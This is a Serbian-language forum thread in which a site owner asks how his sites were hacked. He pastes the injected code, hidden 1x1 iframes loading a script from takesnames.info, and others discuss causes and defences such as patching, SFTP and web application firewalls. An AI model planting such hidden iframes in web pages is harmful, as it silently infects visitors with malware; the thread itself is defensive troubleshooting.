Nekoliko mojih sajtova je hakovano tako sto je ubacen skriveni iframe iframe tag a da nije bilo promene ostalog sadrzaja, sa namerom da sto duze ostane neprimecen, dok mi se desavalo i da obrisu celu stranicu i ostave iframe tagove.

Google me je konatktirao da je na jednoj stranici maliciozni kod koji posetioce moze da zarazi nekim virusom.

Evo koda koji je ostao na jednoj od stranica:
-->--><!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>
<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->

Da li znate na koji nacun su hakovali ove sajtove, i da li ovo rade botovi ?

Mislim da je u pitanju bot, koji ima pristup fajlovima na serveru i izmenama istih. Imao sam slučaj kod jednog klijenta da bot isto tako ubaci deo koda u sve stranice koje sadrže "index" u nazivu, čak i one neaktivne.

Cini mi se da je u tvom slucaju bot, a kako su ubacili ... hm ... ne mogu tacno reci dok ne vidim stranicu ali verovatno imas neki "persistent XSS" propust.

ako koristis smarty pogledaj da li nije malo zastareo :)

Ivane, XSS se moze manifestovati samo uz akcije posetilaca.

Dok kao sto vidimo ovde, njemu je neko dodao kod na stranu :) Da lici na nekog bot-a, ali
tu je sam kriv zato sto ne vodi racuna o greskama koje software koji on koristi mozda ima.

Da nisi mozda koristio OScommerce?!?

Pozdrav.

mislim da je postojao ovakav problem sa starijim verzijama Wordpressa, propust koji su botovi koristili da dodaju viruse.. taj se problem resavao apgrejdom..

inace, pogledaj apache log fajlove i pokusaj da snimis trenutak kad se prvi put pojavljuju zahtevi za te ifrejmove, a onda pogledaj par zahteva ispred toga ko je sta pozivao... trebalo bi da tako moze da se nasluti nacin kako su te uhakovali...

@LiquidBrain

Malo ti je nejasan zakljucak, XSS se manifestuje prilikom posete korisnika ali takodje moze da postoji na stranici kao npr neki komentar na nekom busnom blog enginu ... zato sam i napisao "persistent XSS".

Mada moze da bude i bilo sta drugo ali mi je ovaj tip napada prvi pao napamet zbog "bot" pristupa.

O kom software-u je rec ?

Isto (ili slično) se desilo i gomili drugih ljudi, pogledaj na Sheinom blogu (http://mezzoblue.com/archives/2007/06/05/unsettling/). U glavnom došli su do zaključka da se dešava na Dreamhostovim serverima i Wordpress blogovima (ne nužno zajedno).

Softver je WordPress MU. Jeste, verzija MU-a jeste zastarela, nisma koristio taj softver i eto. Mada su mi hakovali i sajtove sa cistim php i html fajlovima, bez ikakvog CMS-a.

Sad cu da update-ujem software pa ce vidimo kom opanci ...

Bitno je da znaš kako su "ušli", fajlovi koje su hakovali su nebitni.

Možeš upasti na jednom mestu i izmeniti milion fajlova. Upadneš kroz WP MU na primer, projuriš sve fajlove sa .html ekstenzijom i ako je pisanje moguće dodaš šta god hoćeš u njih. Ulaz - 1, izmenjenih fajlova - mlogo :D

Zato uglavnom dajem savete ljudima da izbegavaju free skripte. Treba da ih nadlgedas i krpiš non stop ako ne želiš da navučeš neku bedu. Komercijalni i custom CMS-ovi su manje popularni i u nekim slučajevima dobro napisani tako da si manje ugrožen. No, koliko para toliko muzike :D

Nedavno je kompromitovano oko 3500 DH FTP naloga, pa sad ti pretpostavi kako su ušli... :)

^ Hehe, da. Upravo sam pročitao: http://simonwillison.net/2007/Jun/6/dreamhost/

^ Hehe, da. Upravo sam pročitao: http://simonwillison.net/2007/Jun/6/dreamhost/

znaci neko im je sniffovao ftp passworde...

posto dreamhost dozvoljava ssh, mogu samo da kazem korisnici su delom sami krivi sto ne koristite sftp ... em podrzava kompresiju podataka, em je mnoooogo sigurniji..

Može li neko da mi kaže kako je najbolje zaštititi sajt od hakera....i koje su obaveze kuće koja hostuje u tom pogledu...u pitanju je domaća kuća za hosting...?:please:

Sto se tice host kompanije, ona mora da omoguci sigurnost svih servisa koje pruza: http, ftp, ssh, ..., i aplikacija koje daje korisnicima na koriscenje tipa: webmail, control panel, statistike, ... Sve ostalo je na tebi (osim ako drugacije nije dogovoreno, mada jos nisam cuo za to).

Da bi ti kao korisnik zastitio svoj sajt prvo trebas biti siguran da si zastitio svoj kod koji si pisao, zatim da imas poslednje sigurnosne zakrpe za aplikacije koje koristis, ... takodje mozes da zatrazis od hosting kompanije da instalira (ako vec nije) neki WAF (web application firewall) kao sto je mod_security, ili da implementiras IDS (intrusion detection system) kao sto je PHPIDS.

Imas na mom blogu vise detalja o ovim stvarima, i bas sada (cim nadjem vremena) planiram da pocnem seriju textova o improvizacijama WAF-ova ...

hvala Ivane...što se tiče host kompanije, oni koji zaista hostuju kod njih su prezadovoljni, mada oni koji imaju host kod drugih kompanija pričaju svašta o njima...iskreno, ja sam laik, zato i tražim nečije mišljenje.... i btw, ja sam žensko :1090:

... i btw, ja sam žensko

Sorry :D